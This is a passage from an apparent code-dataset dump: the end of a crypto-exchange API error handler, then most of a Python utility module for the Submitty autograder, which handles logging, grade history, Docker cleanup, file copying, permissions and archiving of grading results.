{\"errno\":\"OK\",\"message\":\"INVALID_PARAMETER\",\"code\":49998,\"trace\":\"eb5ebb54-23cd-4de2-9064-e090b6c3b2e3\",\"data\":null}\n #\n message = self.safe_string(response, 'message')\n errorCode = self.safe_string(response, 'code')\n if ((errorCode is not None) and (errorCode != '1000')) or ((message is not None) and (message != 'OK')):\n feedback = self.id + ' ' + body\n self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], errorCode, feedback)\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n"} {"ext": "py", "sha": "1a312e02e13b66b2b41f27a3b5a39a6a2c01bd9a", "content": "\"\"\"\nWrites out submission datetime details (when it was submitted, how long it was in grading\nprocess, etc) to a history.json file which is a list of all grading attempts for a\nparticular submission (including initial grading of it and all regrades).\n\"\"\"\n\nimport os\nimport sys\nimport collections\nimport json\nfrom datetime import datetime\nfrom submitty_utils import dateutils\nimport fcntl\nimport traceback\nimport zipfile\nimport stat\nimport subprocess\nimport shutil\nimport codecs\nimport glob\nimport docker\n\nfrom typing import Optional\n\n\nclass Logger:\n \"\"\"Specialized logger class that accumulates stack traces.\"\"\"\n\n def __init__(\n self, *,\n log_dir: str,\n stack_trace_dir: str,\n capture_traces: bool = False,\n # This used to be \"UNKNOWN\", but \"NO JOB\" better describes the circumstances.\n job_id: str = \"NO JOB\",\n ):\n self.log_dir = log_dir\n self.stack_trace_dir = stack_trace_dir\n self.capture_traces = capture_traces\n self.accumulated_traces = []\n self.job_id = job_id\n\n def _log_filename(self) -> str:\n \"\"\"Get the name of the file that should be logged into.\n\n Currently, this is in the format YYYYMMDD.txt.\n \"\"\"\n now = dateutils.get_current_time()\n return f'{datetime.strftime(now, \"%Y%m%d\")}.txt'\n\n @property\n def log_path(self) -> str:\n \"\"\"Get the full path to the regular logging file.\"\"\"\n return os.path.join(self.log_dir, self._log_filename())\n\n @property\n def stack_trace_path(self) -> str:\n \"\"\"Get the full path to the stack trace logging file.\"\"\"\n return os.path.join(self.stack_trace_dir, self._log_filename())\n\n def log_message(\n self, message: str, *,\n is_batch: bool = False,\n which_untrusted: str = \"\",\n jobname: str = \"\",\n timelabel: str = \"\",\n elapsed_time: Optional[int] = None,\n job_id: Optional[str] = None\n ):\n \"\"\"Log a message to this logger's configured log directory.\"\"\"\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n batch_string = \"BATCH\" if is_batch else \"\"\n if elapsed_time is None:\n elapsed_time = -1\n elapsed_time_string = \"\" if elapsed_time < 0 else '{:9.3f}'.format(elapsed_time)\n time_unit = \"\" if elapsed_time < 0 else \"sec\"\n job_id = job_id or self.job_id\n parts = (easy_to_read_date, f\"{job_id:>6s}\", f\"{batch_string:>5s}\", f\"{which_untrusted:>11s}\",\n f\"{jobname:75s}\", f\"{timelabel:6s} {elapsed_time_string:>9s} {time_unit:>3s}\", message)\n write_to_log(self.log_path, ' | '.join((str(x) for x in parts)))\n\n def log_stack_trace(\n self, trace: str, *,\n is_batch: bool = False,\n which_untrusted: str = '',\n job_id: Optional[str] = None,\n jobname: str = \"\",\n echo_source: Optional[str] = None,\n ):\n \"\"\"Log a stack trace to this logger's configured stack trace directory.\"\"\"\n job_id = job_id or self.job_id\n # Save the parameters to this trace so we can duplicate these on the\n # shipper's end once the job finishes.\n #\n # TODO: Maybe we want to store time info too? Might need to think a bit\n # more in terms of the stack traces log file format.\n if self.capture_traces:\n self.accumulated_traces.append({\n 'trace': trace,\n 'is_batch': is_batch,\n 'which_untrusted': which_untrusted,\n 'job_id': job_id,\n 'jobname': jobname,\n })\n # Always run this since this could be deleted without us knowing\n os.makedirs(self.stack_trace_dir, exist_ok=True)\n\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n\n message = f\"[{easy_to_read_date}][{job_id:>6s}]\\n\"\n if echo_source is not None:\n message += f\"== (Echoed from {echo_source})\\n\"\n message += f\"== Batch? {is_batch}\\n\"\n message += f\"== Which: {which_untrusted}\\n\"\n message += f\"== Job: {jobname}\\n\"\n for line in trace.splitlines():\n message += f\"== {line}\\n\"\n message = message.strip()\n write_to_log(self.stack_trace_path, message)\n\n\ndef just_write_grade_history(json_file,assignment_deadline,submission_time,seconds_late,\n first_access_time,access_duration,queue_time,batch_regrade,grading_began,\n wait_time,grading_finished,grade_time,autograde_total,\n revision):\n\n #####################################\n # LOAD THE PREVIOUS HISTORY\n if os.path.isfile(json_file):\n with open(json_file, 'r') as infile:\n obj = json.load(infile, object_pairs_hook=collections.OrderedDict)\n else:\n obj = []\n\n #####################################\n # CREATE THE NEWEST INFO BLOB\n blob = collections.OrderedDict()\n blob[\"assignment_deadline\"] = assignment_deadline\n blob[\"submission_time\"] = submission_time\n seconds_late = seconds_late\n if seconds_late > 0:\n minutes_late = int((seconds_late+60-1) / 60)\n hours_late = int((seconds_late+60*60-1) / (60*60))\n days_late = int((seconds_late+60*60*24-1) / (60*60*24))\n blob[\"days_late_before_extensions\"] = days_late\n blob[\"queue_time\"] = queue_time\n blob[\"batch_regrade\"] = True if batch_regrade == \"BATCH\" else False\n blob[\"first_access_time\"] = first_access_time\n blob[\"access_duration\"] = access_duration\n blob[\"grading_began\"] = grading_began\n blob[\"wait_time\"] = wait_time\n blob[\"grading_finished\"] = grading_finished\n blob[\"grade_time\"] = grade_time\n blob[\"autograde_result\"] = autograde_total\n autograde_array = str.split(autograde_total)\n if len(autograde_array) > 0 and autograde_array[0] == \"Automatic\":\n blob[\"autograde_total\"] = int(autograde_array[3])\n if len(autograde_array) == 6:\n blob[\"autograde_max_possible\"] = int(autograde_array[5])\n if revision:\n blob[\"revision\"] = revision\n\n\n #####################################\n # ADD IT TO THE HISTORY\n obj.append(blob)\n with open(json_file, 'w') as outfile:\n json.dump(obj, outfile, indent=4, separators=(',', ': '))\n\n\n# ==================================================================================\n#\n# LOGGING FUNCTIONS\n#\n# ==================================================================================\n\n\ndef log_container_meta(log_path, event=\"\", name=\"\", container=\"\", time=0):\n \"\"\" Given a log file, create or append container meta data to a log file. \"\"\"\n\n now = dateutils.get_current_time()\n easy_to_read_date = dateutils.write_submitty_date(now, True)\n time_unit = \"sec\"\n parts = (easy_to_read_date, name, container, event, f\"{time:.3f}\", time_unit)\n write_to_log(log_path, ' | '.join(parts))\n\n\ndef write_to_log(log_path, message):\n \"\"\" Given a log file, create or append message to log file\"\"\"\n with open(log_path, 'a+') as log_file:\n try:\n fcntl.flock(log_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n print(message, file=log_file)\n fcntl.flock(log_file, fcntl.LOCK_UN)\n except:\n print(\"Could not gain a lock on the log file.\")\n\n\n# ==================================================================================\n#\n# VALIDATION FUNCTIONS\n#\n# ==================================================================================\n\ndef setup_for_validation(config, working_directory, complete_config, is_vcs, testcases, job_id):\n \"\"\" Prepare a directory for validation by copying in and permissioning the required files. \"\"\"\n\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_results = os.path.join(working_directory,\"TMP_RESULTS\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n checkout_subdirectory = complete_config[\"autograding\"].get(\"use_checkout_subdirectory\",\"\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n tmp_work_test_output = os.path.join(tmp_work, \"test_output\")\n tmp_work_generated_output = os.path.join(tmp_work, \"generated_output\")\n tmp_work_instructor_solution = os.path.join(tmp_work, \"instructor_solution\")\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n\n os.mkdir(tmp_work_test_output)\n os.mkdir(tmp_work_generated_output)\n os.mkdir(tmp_work_instructor_solution)\n\n patterns = complete_config['autograding']\n\n # Add all permissions to tmp_work\n add_permissions_recursive(tmp_work,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n # Copy required submission/checkout files\n pattern_copy(\"submission_to_validation\", patterns['submission_to_validation'], submission_path, tmp_work, tmp_logs)\n checkout_subdir_path = os.path.join(tmp_submission, 'checkout', checkout_subdirectory)\n if os.path.exists(checkout_subdir_path):\n pattern_copy(\"checkout_to_validation\", patterns['submission_to_validation'],checkout_subdir_path,tmp_work,tmp_logs)\n\n for c in testcases:\n if c.type == 'Compilation':\n pattern_copy(\"compilation_to_validation\", patterns['compilation_to_validation'], c.secure_environment.directory, tmp_work, tmp_logs)\n\n # Copy expected files into the tmp_work_test_output path\n test_output_path = os.path.join(tmp_autograding, 'test_output')\n copy_contents_into(config, job_id, test_output_path, tmp_work_test_output, tmp_logs)\n generated_output_path = os.path.join(tmp_autograding, 'generated_output')\n copy_contents_into(config, job_id, generated_output_path, tmp_work_generated_output, tmp_logs)\n\n # Copy in instructor solution code.\n instructor_solution = os.path.join(tmp_autograding, 'instructor_solution')\n copy_contents_into(config, job_id, instructor_solution, tmp_work_instructor_solution, tmp_logs)\n\n # Copy any instructor custom validation code into the tmp work directory\n custom_validation_code_path = os.path.join(tmp_autograding, 'custom_validation_code')\n copy_contents_into(config, job_id, custom_validation_code_path, tmp_work, tmp_logs)\n\n # Copy the .submit.notebook to tmp_work for validation\n submit_notebook_path = os.path.join(tmp_submission, 'submission', \".submit.notebook\")\n if os.path.exists(submit_notebook_path):\n shutil.copy(\n submit_notebook_path,\n os.path.join(tmp_work, '.submit.notebook')\n )\n\n\n # Copy the validation script into this directory.\n bin_runner = os.path.join(tmp_autograding, \"bin\",\"validate.out\")\n my_runner = os.path.join(tmp_work, \"my_validator.out\")\n\n shutil.copy(bin_runner, my_runner)\n\n add_permissions_recursive(tmp_work,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n add_permissions(my_runner, stat.S_IXUSR | stat.S_IXGRP |stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n# ==================================================================================\n#\n# ARCHIVAL AND PERMISSIONS FUNCTIONS\n#\n# ==================================================================================\n\ndef add_all_permissions(path):\n \"\"\" Recursively chmod a directory or file 777. \"\"\"\n if os.path.isdir(path):\n add_permissions_recursive(path,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n elif os.path.isfile(path):\n add_permissions(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH)\n\n\ndef lock_down_folder_permissions(top_dir):\n # Chmod a directory to take away group and other rwx.\n os.chmod(top_dir,os.stat(top_dir).st_mode & ~stat.S_IRGRP & ~stat.S_IWGRP & ~stat.S_IXGRP & ~stat.S_IROTH & ~stat.S_IWOTH & ~stat.S_IXOTH)\n\ndef cleanup_stale_containers(user_id_of_runner, my_log_function):\n # Remove any docker containers left over from past runs.\n client = docker.from_env(timeout=60)\n try:\n # Get all containers (running or not) with user_id_of_runner in their name\n # sparse=True gets containers without fully evaluating them. This is important,\n # as race conditions with other grading threads can cause this call to fail otherwise.\n old_containers = client.containers.list(all=True, filters={\"name\":user_id_of_runner}, sparse=True)\n for old_container in old_containers:\n try:\n my_log_function(f'Removing stale container {old_container.name}')\n old_container.remove(force=True)\n except docker.errors.NotFound:\n # This is an expected case which does not constitute an error, caused\n # by the use of sparse=True\n pass\n except Exception:\n my_log_function(\"ERROR: Could not remove docker container\")\n\n # Get all networks with user_id_of_runner in their name\n old_networks = client.networks.list(filters={\"name\":user_id_of_runner})\n for old_network in old_networks:\n try:\n my_log_function(f'Removing stale network {old_network.name}')\n old_network.remove()\n except Exception:\n my_log_function(\"ERROR: Could not remove docker network\")\n finally:\n client.close()\n\n\ndef prepare_directory_for_autograding(config, working_directory, user_id_of_runner, autograding_zip_file, submission_zip_file, is_test_environment):\n \"\"\"\n Given a working directory, set up that directory for autograding by creating the required subdirectories\n and configuring permissions.\n \"\"\"\n\n # If an old (stale) version of the working directory exists, we need to remove it.\n if os.path.exists(working_directory):\n # Make certain we can remove old instances of the working directory.\n if not is_test_environment:\n untrusted_grant_rwx_access(\n config.submitty['submitty_install_dir'], user_id_of_runner, working_directory\n )\n add_all_permissions(working_directory)\n shutil.rmtree(working_directory,ignore_errors=True)\n\n # Create the working directory\n os.mkdir(working_directory)\n\n # Important directory variables.\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n tmp_work_test_input = os.path.join(tmp_work, \"test_input\")\n\n os.mkdir(tmp_work)\n os.mkdir(tmp_work_test_input)\n\n # Unzip the autograding and submission folders\n unzip_this_file(autograding_zip_file,tmp_autograding)\n unzip_this_file(submission_zip_file,tmp_submission)\n\n\n with open(os.path.join(tmp_autograding, \"complete_config.json\"), 'r') as infile:\n complete_config_obj = json.load(infile)\n\n # Handle the case where a student errantly submits to multiple parts of a one part only gradeable.\n if complete_config_obj.get('one_part_only', False) == True:\n allow_only_one_part(submission_path, log_path=os.path.join(tmp_logs, \"overall.txt\"))\n\n with open(os.path.join(tmp_submission,\"queue_file.json\"), 'r') as infile:\n queue_obj = json.load(infile)\n job_id = queue_obj[\"job_id\"]\n\n # copy output files\n test_input_path = os.path.join(tmp_autograding, 'test_input')\n # Copy test input files into tmp_work_test_input.\n copy_contents_into(config, job_id, test_input_path, tmp_work_test_input, tmp_logs)\n\n # Lock down permissions on the unzipped folders/test input folder to stop untrusted users from gaining access.\n lock_down_folder_permissions(tmp_work_test_input)\n lock_down_folder_permissions(tmp_autograding)\n lock_down_folder_permissions(tmp_submission)\n\n\ndef archive_autograding_results(\n config,\n working_directory: os.PathLike,\n job_id: str,\n which_untrusted: str,\n is_batch_job: bool,\n complete_config_obj: dict,\n gradeable_config_obj: dict,\n queue_obj: dict,\n is_test_environment: bool\n):\n \"\"\" After grading is finished, archive the results. \"\"\"\n\n tmp_autograding = os.path.join(working_directory,\"TMP_AUTOGRADING\")\n tmp_submission = os.path.join(working_directory,\"TMP_SUBMISSION\")\n tmp_work = os.path.join(working_directory,\"TMP_WORK\")\n tmp_logs = os.path.join(working_directory,\"TMP_SUBMISSION\",\"tmp_logs\")\n tmp_results = os.path.join(working_directory,\"TMP_RESULTS\")\n submission_path = os.path.join(tmp_submission, \"submission\")\n random_output_path = os.path.join(tmp_work, 'random_output')\n\n if \"generate_output\" not in queue_obj:\n partial_path = os.path.join(queue_obj[\"gradeable\"],queue_obj[\"who\"],str(queue_obj[\"version\"]))\n item_name = os.path.join(queue_obj[\"semester\"],queue_obj[\"course\"],\"submissions\",partial_path)\n elif queue_obj[\"generate_output\"]:\n item_name = os.path.join(queue_obj[\"semester\"],queue_obj[\"course\"],\"generated_output\",queue_obj[\"gradeable\"])\n results_public_dir = os.path.join(tmp_results,\"results_public\")\n results_details_dir = os.path.join(tmp_results, \"details\")\n patterns = complete_config_obj['autograding']\n\n # Copy work to details\n pattern_copy(\"work_to_details\", patterns['work_to_details'], tmp_work, results_details_dir, tmp_logs)\n\n # Copy work to public\n if 'work_to_public' in patterns:\n pattern_copy(\"work_to_public\", patterns['work_to_public'], tmp_work, results_public_dir, tmp_logs)\n\n if os.path.exists(random_output_path):\n pattern_copy(\"work_to_random_output\", [os.path.join(random_output_path, '**', '*.txt'),], tmp_work, tmp_results, tmp_logs)\n # timestamp of first access to the gradeable page\n first_access_string = \"\"\n # grab the submission time\n if \"generate_output\" in queue_obj and queue_obj[\"generate_output\"]:\n submission_string = \"\"\n else:\n with open(os.path.join(tmp_submission, 'submission' ,\".submit.timestamp\"), 'r') as submission_time_file:\n submission_string = submission_time_file.read().rstrip()\n # grab the first access to the gradeable page (if it exists)\n user_assignment_access_filename = os.path.join(tmp_submission, \".user_assignment_access.json\")\n if os.path.exists(user_assignment_access_filename):\n with open(user_assignment_access_filename, 'r') as access_file:\n obj = json.load(access_file)\n first_access_string = obj[0][\"timestamp\"]\n\n history_file_tmp = os.path.join(tmp_submission,\"history.json\")\n history_file = os.path.join(tmp_results,\"history.json\")\n if os.path.isfile(history_file_tmp) and not is_test_environment:\n shutil.move(history_file_tmp, history_file)\n # fix permissions\n ta_group_id = os.stat(tmp_results).st_gid\n os.chown(history_file, int(config.submitty_users['daemon_uid']),ta_group_id)\n add_permissions(history_file, stat.S_IRGRP)\n grading_finished = dateutils.get_current_time()\n grade_result = \"\"\n if \"generate_output\" not in queue_obj:\n try:\n shutil.copy(os.path.join(tmp_work, \"grade.txt\"), tmp_results)\n with open(os.path.join(tmp_work,\"grade.txt\")) as f:\n lines = f.readlines()\n for line in lines:\n line = line.rstrip('\\n')\n if line.startswith(\"Automatic grading total:\"):\n grade_result = line\n except:\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(f\"\\n\\nERROR: Grading incomplete -- Could not process {os.path.join(tmp_work,'grade.txt')}\")\n config.logger.log_message(\n \"ERROR: could not process grade.txt. See stack trace entry for more details.\",\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n config.logger.log_stack_trace(\n traceback.format_exc(),\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n\n gradeable_deadline_string = gradeable_config_obj[\"date_due\"]\n submission_datetime = dateutils.read_submitty_date(submission_string)\n gradeable_deadline_datetime = dateutils.read_submitty_date(gradeable_deadline_string)\n gradeable_deadline_longstring = dateutils.write_submitty_date(gradeable_deadline_datetime)\n submission_longstring = dateutils.write_submitty_date(submission_datetime)\n seconds_late = int((submission_datetime-gradeable_deadline_datetime).total_seconds())\n # compute the access duration in seconds (if it exists)\n access_duration = -1\n if first_access_string != \"\":\n first_access_datetime = dateutils.read_submitty_date(first_access_string)\n access_duration = int((submission_datetime-first_access_datetime).total_seconds())\n\n # note: negative = not late\n grading_finished_longstring = dateutils.write_submitty_date(grading_finished)\n\n with open(os.path.join(tmp_submission,\".grading_began\"), 'r') as f:\n grading_began_longstring = f.read()\n grading_began = dateutils.read_submitty_date(grading_began_longstring)\n\n gradingtime = (grading_finished - grading_began).total_seconds()\n\n queue_obj[\"gradingtime\"]=gradingtime\n queue_obj[\"grade_result\"]=grade_result\n queue_obj[\"which_untrusted\"]=which_untrusted\n waittime = queue_obj[\"waittime\"]\n\n try:\n\n # Make certain results.json is utf-8 encoded.\n results_json_path = os.path.join(tmp_work, 'results.json')\n with codecs.open(results_json_path, 'r', encoding='utf-8', errors='ignore') as infile:\n results_str = \"\".join(line.rstrip() for line in infile)\n results_obj = json.loads(results_str)\n with open(results_json_path, 'w') as outfile:\n json.dump(results_obj, outfile, indent=4)\n\n shutil.move(results_json_path, os.path.join(tmp_results, \"results.json\"))\n except:\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(f\"\\n\\nERROR: Grading incomplete -- Could not open/write {os.path.join(tmp_work,'results.json')}\")\n config.logger.log_message(\n \"ERROR: results.json read/write error\",\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n config.logger.log_stack_trace(\n traceback.format_exc(),\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n\n # Rescue custom validator files\n custom_validator_output_directory = os.path.join(tmp_results, \"custom_validator_output\")\n pattern_copy(\"rescue_custom_validator_validation_jsons\", [os.path.join(tmp_work, 'validation_results_*.json'),], tmp_work, custom_validator_output_directory, tmp_logs)\n pattern_copy(\"rescue_custom_validator_logs\", [os.path.join(tmp_work, 'validation_logfile_*.txt'),], tmp_work, custom_validator_output_directory, tmp_logs)\n pattern_copy(\"rescue_custom_validator_errors\", [os.path.join(tmp_work, 'validation_stderr_*.txt'),], tmp_work, custom_validator_output_directory, tmp_logs)\n\n just_write_grade_history(history_file,\n gradeable_deadline_longstring,\n submission_longstring,\n seconds_late,\n first_access_string,\n access_duration,\n queue_obj[\"queue_time\"],\n \"BATCH\" if is_batch_job else \"INTERACTIVE\",\n grading_began_longstring,\n int(waittime),\n grading_finished_longstring,\n int(gradingtime),\n grade_result,\n queue_obj.get(\"revision\", None))\n\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(\"FINISHED GRADING!\\n\")\n\n config.logger.log_message(\n grade_result,\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n timelabel=\"grade:\",\n elapsed_time=gradingtime\n )\n\n with open(os.path.join(tmp_results,\"queue_file.json\"),'w') as outfile:\n json.dump(queue_obj,outfile,sort_keys=True,indent=4,separators=(',', ': '))\n\n # save the logs!\n shutil.copytree(tmp_logs,os.path.join(tmp_results,\"logs\"))\n\n # Save the .submit.notebook\n # Copy the .submit.notebook to tmp_work for validation\n submit_notebook_path = os.path.join(tmp_submission, 'submission', \".submit.notebook\")\n if os.path.exists(submit_notebook_path):\n shutil.copy(\n submit_notebook_path,\n os.path.join(tmp_results, \".submit.notebook\")\n )\n\n\ndef allow_only_one_part(path, log_path=os.devnull):\n \"\"\"\n Given a path to a directory, iterate through the directory and detect folders that start with\n \"part\". If there is more than one and they have files, then delete all of the part folders except\n for the first one that has files.\n\n An example would be if you had the folder structure:\n part1/\n test.py\n part2/\n test.cpp\n\n Then the part2 folder would be deleted, leaving just the part1 folder.\n\n :param path: string filepath to directory to scan for parts in\n :param log_path: string filepath to file to write print statements to\n \"\"\"\n if not os.path.isdir(path):\n return\n with open(log_path, 'a') as log:\n clean_directories = []\n print('Clean up multiple parts')\n log.flush()\n for entry in sorted(os.listdir(path)):\n full_path = os.path.join(path, entry)\n if not os.path.isdir(full_path) or not entry.startswith('part'):\n continue\n count = len(os.listdir(full_path))\n print('{}: {}'.format(entry, count))\n if count > 0:\n clean_directories.append(full_path)\n\n if len(clean_directories) > 1:\n print(\"Student submitted to multiple parts in violation of instructions.\\n\"\n \"Removing files from all but first non empty part.\")\n\n for i in range(1, len(clean_directories)):\n print(\"REMOVE: {}\".format(clean_directories[i]))\n for entry in os.listdir(clean_directories[i]):\n print(\" -> {}\".format(entry))\n shutil.rmtree(clean_directories[i])\n\n# go through the testcase folder (e.g. test01/) and remove anything\n# that matches the test input (avoid archiving copies of these files!)\ndef remove_test_input_files(overall_log, test_input_path, testcase_folder):\n for path, subdirs, files in os.walk(test_input_path):\n for name in files:\n relative = path[len(test_input_path)+1:]\n my_file = os.path.join(testcase_folder, relative, name)\n if os.path.isfile(my_file):\n print (\"removing (likely) stale test_input file: \", my_file, file=overall_log)\n overall_log.flush()\n os.remove(my_file)\n\n\ndef add_permissions(item,perms):\n if os.getuid() == os.stat(item).st_uid:\n os.chmod(item,os.stat(item).st_mode | perms)\n # else, can't change permissions on this file/directory!\n\n\ndef add_permissions_recursive(top_dir,root_perms,dir_perms,file_perms):\n for root, dirs, files in os.walk(top_dir):\n add_permissions(root,root_perms)\n for d in dirs:\n add_permissions(os.path.join(root, d),dir_perms)\n for f in files:\n add_permissions(os.path.join(root, f),file_perms)\n\n\n# copy the files & directories from source to target\n# it will create directories as needed\n# it's ok if the target directory or subdirectories already exist\n# it will overwrite files with the same name if they exist\ndef copy_contents_into(config, job_id, source, target, tmp_logs):\n if not os.path.isdir(target):\n config.logger.log_message(\n \"ERROR: Could not copy contents. The target directory does not exist: \" + target,\n job_id=job_id\n )\n raise RuntimeError(\"ERROR: the target directory does not exist: '\", target, \"'\")\n if os.path.isdir(source):\n for item in os.listdir(source):\n if os.path.isdir(os.path.join(source,item)):\n if os.path.isdir(os.path.join(target,item)):\n # recurse\n copy_contents_into(config, job_id,os.path.join(source,item),os.path.join(target,item),tmp_logs)\n elif os.path.isfile(os.path.join(target,item)):\n config.logger.log_message(\n \"ERROR: the target subpath is a file not a directory \"\n f\"'{os.path.join(target,item)}'\",\n job_id=job_id,\n )\n raise RuntimeError(\"ERROR: the target subpath is a file not a directory '\", os.path.join(target,item), \"'\")\n else:\n # copy entire subtree\n shutil.copytree(os.path.join(source,item),os.path.join(target,item))\n else:\n if os.path.exists(os.path.join(target,item)):\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n print (\"\\nWARNING: REMOVING DESTINATION FILE\" , os.path.join(target,item),\n \" THEN OVERWRITING: \", os.path.join(source,item), \"\\n\", file=f)\n os.remove(os.path.join(target,item))\n try:\n shutil.copy(os.path.join(source,item),target)\n except:\n config.logger.log_stack_trace(traceback.format_exc(), job_id=job_id)\n return\n else:\n print(f'{source} is not a directory')\n\n\n# copy files that match one of the patterns from the source directory\n# to the target directory.\ndef pattern_copy(what, patterns, source, target, tmp_logs):\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n print (what,\" pattern copy \", patterns, \" from \", source, \" -> \", target, file=f)\n for pattern in patterns:\n for my_file in glob.glob(os.path.join(source,pattern),recursive=True):\n if (os.path.isfile(my_file)):\n # grab the matched name\n relpath = os.path.relpath(my_file,source)\n # make the necessary directories leading to the file\n os.makedirs(os.path.join(target,os.path.dirname(relpath)),exist_ok=True)\n # copy the file\n shutil.copy(my_file,os.path.join(target,relpath))\n print (\" COPY \",my_file,\n \" -> \",os.path.join(target,relpath), file=f)\n else:\n print (\"skip this directory (will recurse into it later)\", my_file, file=f)\n\n\n# give permissions to all created files to the DAEMON_USER\ndef untrusted_grant_rwx_access(SUBMITTY_INSTALL_DIR, which_untrusted, my_dir):\n subprocess.call([os.path.join(SUBMITTY_INSTALL_DIR, \"sbin\", \"untrusted_execute\"),\n which_untrusted,\n \"/usr/bin/find\",\n my_dir,\n \"-user\",\n which_untrusted,\n \"-exec\",\n \"/bin/chmod\",\n \"ugo+rwx\",\n \"{}\",\n \";\"])\n\n# Used by packer unpacker\ndef zip_my_directory(path,zipfilename):\n zipf = zipfile.ZipFile(zipfilename,'w',zipfile.ZIP_DEFLATED)\n for root,dirs,files in os.walk(path):\n for my_file in files:\n relpath = root[len(path)+1:]\n zipf.write(os.path.join(root,my_file),os.path.join(relpath,my_file))\n zipf.close()\n\n# Used by packer unpacker\ndef unzip_this_file(zipfilename,path):\n if not os.path.exists(zipfilename):\n raise RuntimeError(\"ERROR: zip file does not exist '\", zipfilename, \"'\")\n zip_ref = zipfile.ZipFile(zipfilename,'r')\n zip_ref.extractall(path)\n zip_ref.close()\n\n# ==================================================================================\n#\n# PRE- AND POST-COMMAND FUNCTIONS\n#\n# ==================================================================================\n\n\ndef pre_command_copy_file(config, source_testcase, source_directory, destination_testcase, destination, job_id, tmp_logs):\n \"\"\" Handles the cp pre_command. \"\"\"\n\n source_testcase = os.path.join(str(os.getcwd()), source_testcase)\n\n if not os.path.isdir(source_testcase):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(source_testcase))\n\n if not os.path.isdir(destination_testcase):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(destination_testcase))\n\n source = os.path.join(source_testcase, source_directory)\n target = os.path.join(destination_testcase, destination)\n\n # The target without the potential executable.\n target_base = '/'.join(target.split('/')[:-1])\n\n # If the source is a directory, we copy the entire thing into the\n # target.\n if os.path.isdir(source):\n # We must copy from directory to directory\n copy_contents_into(config, job_id, source, target, tmp_logs)\n\n # Separate ** and * for simplicity.\n elif not '**' in source:\n # Grab all of the files that match the pattern\n files = glob.glob(source, recursive=True)\n\n # The target base must exist in order for a copy to occur\n if target_base != '' and not os.path.isdir(target_base):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(target_base))\n # Copy every file. This works whether target exists (is a directory) or does not (is a target file)\n for file in files:\n try:\n shutil.copy(file, target)\n except Exception as e:\n traceback.print_exc()\n config.logger.log_message(\n f\"Pre Command could not perform copy: {file} -> {target}\",\n job_id=job_id\n )\n else:\n # Everything after the first **.\n source_base = source[:source.find('**')]\n # The full target must exist (we must be moving to a directory.)\n if not os.path.isdir(target):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(target))\n\n # Grab all of the files that match the pattern.\n files = glob.glob(source, recursive=True)\n\n # For every file matched\n for file_source in files:\n file_target = os.path.join(target, file_source.replace(source_base,''))\n # Remove the file path.\n file_target_dir = '/'.join(file_target.split('/')[:-1])\n # If the target directory doesn't exist, create it.\n if not os.path.isdir(file_target_dir):\n os.makedirs(file_target_dir)\n # Copy.\n try:\n 